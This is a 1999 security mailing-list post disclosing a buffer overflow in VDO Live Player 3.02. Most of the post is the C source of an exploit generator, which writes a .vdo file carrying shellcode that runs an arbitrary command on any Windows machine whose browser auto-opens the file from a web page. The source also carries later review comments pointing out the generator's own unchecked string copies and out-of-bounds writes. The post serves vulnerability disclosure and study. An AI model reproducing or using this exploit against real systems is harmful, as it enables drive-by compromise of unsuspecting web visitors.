VDO Live Player 3.02 Buffer Overflow

From: UNYUN (shadowpenguinat_private)
Date: Sun Dec 12 1999 - 13:25:16 PST


    Hello
    
    VDO Live Player overflows when it reads a .vdo file that contains a
    long address. If VDO Live Player is installed on the system and the
    browser uses its default settings, the .vdo file is downloaded and executed
    without confirmation. So, if a client visits a web page that contains
    code to download a .vdo file automatically (such as a META tag) and the
    file contains the attack code, the client machine will be compromised by the
    instructions written in the .vdo file.
    
    The buffer pointed to by ESP is too small to hold complex code, but
    the first line of the .vdo file is stored at the address ecx+0x30,
    which is long enough to hold the attack code.
    
    The following sample source code generates a .vdo file that
    executes arbitrary commands on the visitor's machine.
    (This code has been tested on Japanese Windows 98 only.)
    
    -----
    /*====================================================================
       ex_vdolive.c / VDO Live Player 3.02 32bit exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguinat_private)
      ===================================================================
    */
    
    #include    <stdio.h>
    #include    <string.h>
    #include    <windows.h>
    
    /* Layout constants consumed by main() when it assembles the two output
       buffers; the offsets below are interpreted nowhere else in this file. */
    #define     RETADR          90      /* offset in buf1 where main() stores the 4-byte address found by the kernel32 scan */
    #define     CODE1_OFS       102     /* offset in buf1 where exploit_jmping is copied */
    #define     CODE2_OFS       10      /* offset in buf2 where exploit_code is copied */
    #define     MAXBUF1         180     /* size of buf1 (main() also writes buf1[MAXBUF1], one past the end) */
    #define     MAXBUF2         1500    /* size of buf2 (same one-past-the-end write in main()) */
    #define     JMPESP_1        0xff    /* first byte of the 2-byte pattern main() scans kernel32 for */
    #define     JMPESP_2        0xe4    /* second byte of that pattern */
    #define     NOP             0x90    /* fill byte for both output buffers */
    #define     KERNEL_NAME     "kernel32.dll"

    /* 11 data bytes followed by a 0 terminator; main() copies strlen() of it,
       so the copy covers the whole sequence only while it contains no 0x00. */
    unsigned char exploit_jmping[100]={
    0x33,0xDB,0x8B,0x41,0x30,0xB3,0xBB,0x03,
    0xC3,0xFF,0xE0,0x00};

    /* 82 data bytes followed by a 0 terminator.  main() overwrites bytes
       0x0d..0x10, 0x21..0x24, 0x35..0x38 and 0x41 with run-time values and
       then strcat()s cmdbuf onto the end, so the 200-byte size is the hard
       limit for the data plus the appended string. */
    unsigned char exploit_code[200]={
    0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,
    0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
    0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,
    0x52,0x32,0xE4,0x83,0xC3,0x06,0x88,0x23,
    0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
    0xF0,0x5A,0x43,0x53,0x52,0x32,0xE4,0x83,
    0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,
    0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,0x83,
    0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
    0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,
    0xFF,0xFF,0x00};
    /* 23-character prefix; main() appends argv[2] to it without a length check. */
    unsigned char cmdbuf[200]="msvcrt.dll.system.exit.";
    
    
    /* Scan [st, ed) for the first position holding the byte pair c1,c2 whose
       address, truncated to 32 bits, has no zero byte.  Returns that truncated
       address, or 0 when no such position exists.  Note that the probe of the
       second byte reads ed[0] when the cursor sits at ed-1, exactly as before.
       This helper is not called anywhere in this file. */
    unsigned int search_mem(unsigned char *st,unsigned char *ed,
                    unsigned char c1,unsigned char c2)
    {
        unsigned char *cur = st;

        while (cur < ed) {
            unsigned int here = (unsigned int)cur;
            int pair_matches = (cur[0] == c1) && (cur[1] == c2);
            int has_zero_byte = ((here      ) & 0xff) == 0
                             || ((here >>  8) & 0xff) == 0
                             || ((here >> 16) & 0xff) == 0
                             || ((here >> 24) & 0xff) == 0;

            if (pair_matches && !has_zero_byte) {
                return here;
            }
            cur++;
        }
        return 0;
    }
    
    /* Program entry point.  argv[1] is the output file name and argv[2] the
       command string appended to cmdbuf.  Builds two NOP-filled buffers,
       patches addresses taken from this process's own kernel32.dll into them,
       and writes "<buf1>/<buf2>\n" to argv[1].
       No explicit return type (pre-C99 implicit int); returns 0 on success,
       every error path calls exit(1). */
    main(int argc,char *argv[])
    {
        unsigned int         i,kp,ip,p1,p2;
        static unsigned char buf1[MAXBUF1],buf2[MAXBUF2],*q;   /* static: zero-initialized */
        FILE                 *fp;
        MEMORY_BASIC_INFORMATION meminfo;

        /* NOTE(review): only argc>=2 is enforced, yet argv[2] is dereferenced
           below; invoking with a single argument reads past the argument vector. */
        if (argc<2){
            printf("usage: %s FileName Command\n",argv[0]);
            exit(1);
        }
        /* kp: load address of kernel32.dll in this process, truncated to 32 bits. */
        if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
            printf("Can not find %s\n",KERNEL_NAME);
            exit(1);
        }

        /* Walk the memory region containing kp looking for the byte pair
           JMPESP_1,JMPESP_2 at an address whose four bytes are all non-zero.
           This duplicates search_mem() above, which is never called.
           NOTE(review): *(q+1) at the last byte of the region reads one byte
           past RegionSize. */
        VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
        for (i=0;i<meminfo.RegionSize;i++){
            ip=kp+i;
            if ( ( ip     &0xff)==0
              || ((ip>>8 )&0xff)==0
              || ((ip>>16)&0xff)==0
              || ((ip>>24)&0xff)==0) continue;
            q=(unsigned char *)ip;
            if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
        }
        if (i==meminfo.RegionSize){
            printf("Can not find codes which are used by this exploit.\n");
            exit(1);
        }

        printf("RETADR  : %x\n",ip);
        /* Fill all but the last byte, so each buffer keeps its zero terminator. */
        memset(buf1,NOP,MAXBUF1-1);
        memset(buf2,NOP,MAXBUF2-1);
        /* Store ip little-endian at RETADR. */
        buf1[RETADR  ]=ip&0xff;
        buf1[RETADR+1]=(ip>>8)&0xff;
        buf1[RETADR+2]=(ip>>16)&0xff;
        buf1[RETADR+3]=(ip>>24)&0xff;
        /* NOTE(review): cmdbuf is 200 bytes and already holds 23; argv[2] is
           appended with no length check. */
        strcat(cmdbuf,argv[2]);
        /* strlen() stops at the first 0x00 in exploit_jmping; with the bytes as
           declared that is the terminator, so all 11 data bytes are copied. */
        strncpy(buf1+CODE1_OFS,exploit_jmping,strlen(exploit_jmping));
        p1=(unsigned int)GetProcAddress((HMODULE)kp,"LoadLibraryA");
        p2=(unsigned int)GetProcAddress((HMODULE)kp,"GetProcAddress");
        printf("LoadLibrary Address    : %x\n",p1);
        printf("GetProcAddress Address : %x\n",p2);

        /* NOTE(review): exploit_code is 200 bytes with 82 already used; the
           appended cmdbuf is not bounded either. */
        strcat(exploit_code,cmdbuf);
        /* Patch p1 little-endian at 0x0d..0x10, p2 at both 0x21..0x24 and
           0x35..0x38.  A zero byte in either address truncates the strlen()-based
           memcpy below at that point. */
        exploit_code[0x0d]=p1&0xff;
        exploit_code[0x0e]=(p1>>8)&0xff;
        exploit_code[0x0f]=(p1>>16)&0xff;
        exploit_code[0x10]=(p1>>24)&0xff;
        exploit_code[0x21]=exploit_code[0x35]=p2&0xff;
        exploit_code[0x22]=exploit_code[0x36]=(p2>>8)&0xff;
        exploit_code[0x23]=exploit_code[0x37]=(p2>>16)&0xff;
        exploit_code[0x24]=exploit_code[0x38]=(p2>>24)&0xff;
        exploit_code[0x41]=strlen(argv[2]);   /* single byte: lengths above 255 wrap */

        memcpy(buf2+CODE2_OFS,exploit_code,strlen(exploit_code));

        /* Exactly 6 bytes, no terminator: the NOP fill continues after it. */
        strncpy(buf1,"vdo://",6);
        /* NOTE(review): index MAXBUF1 is one past the end of buf1 (likewise
           MAXBUF2 for buf2); both arrays are already terminated by their
           untouched, zero-initialized last byte, so these two stores are
           out-of-bounds writes with no effect on the output. */
        buf1[MAXBUF1]=0;
        buf2[MAXBUF2]=0;
        if ((fp=fopen(argv[1],"w"))==NULL){
            printf("Can not create '%s'\n",argv[1]);
            exit(1);
        }
        /* fp is never fclose()d; the stream is flushed at normal termination
           and the fprintf() result is not checked. */
        fprintf(fp,"%s/%s\n",buf1,buf2);
        printf("File '%s' is created.\n",argv[1]);
        return FALSE;   /* FALSE is 0 from <windows.h> */
    }
    
    -----
    UNYUN
    % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
       shadowpenguinat_private (webmaster)
    % eEye Digital Security Team [ http://www.eEye.com ]
       unyunat_private
    


